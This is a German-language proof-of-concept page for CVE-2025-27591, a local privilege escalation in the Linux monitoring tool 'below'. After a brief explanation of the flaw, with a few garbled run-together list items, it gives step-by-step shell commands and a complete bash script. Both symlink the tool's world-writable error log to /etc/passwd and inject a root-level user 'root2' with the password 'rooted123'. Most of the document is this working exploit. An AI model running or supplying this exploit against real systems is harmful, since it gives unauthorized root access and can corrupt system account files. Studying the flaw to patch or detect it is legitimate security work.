
Lokale Rechteausweitung über `below` (CVE-2025-27591) - PoC Exploit
Below ist ein Linux-Tool zur Aufzeichnung und Anzeige von Systemdaten wie Hardware-Auslastung und Cgroup-Metriken.
In Versionen vor v0.9.0 läuft der systemd-Dienst von Below mit root-Rechten und erstellt weltweit beschreibbare Log-Verzeichnisse und -Dateien unter /var/log/below. Diese unsichere Konfiguration ermöglicht Symlink-Angriffe, mit denen ein unprivilegierter lokaler Benutzer seine Rechte auf root ausweiten kann.
Diesem Problem wurde CVE-2025-27591 zugewiesen.
Upstream hat es in v0.9.0 behoben.
/var/log/below/var/log/below zur Laufzeit 0777-Berechtigungen hat./var/log/below/error_root.log mit 0666-Berechtigungen./etc/passwd) ersetzen.Dieses Verhalten umgeht die protected_symlinks-Härtung des Kernels, da das Sticky-Bit nicht gesetzt ist.
Indem wir error_root.log auf /etc/passwd zeigen lassen, können wir einen neuen Root-Benutzer mit bekanntem Passwort injizieren.
Schritt 1: Erstelle ein Backup von /etc/passwd.
Erstelle immer ein Backup, bevor du Systemdateien änderst:
cp /etc/passwd /tmp/passwd.bak
Schritt 2: Generiere einen bösartigen Benutzereintrag
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload
Schritt 3: Erstelle einen Symlink auf das anfällige Log
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
Schritt 4: Löse die Log-Erstellung aus
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
Schritt 5: Überschreibe /etc/passwd
cat /tmp/payload > /var/log/below/error_root.log
Schritt 6: Wechsle zum neuen Root-Benutzer
su root2
# password: rooted123
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'
TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"
echo "[*] CVE-2025-27591 Privilege Escalation Exploit"
# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
echo "[!] 'below' is not available via sudo. Exiting."
exit 1
fi
# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"
# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')
# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"
# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"
# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"
# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
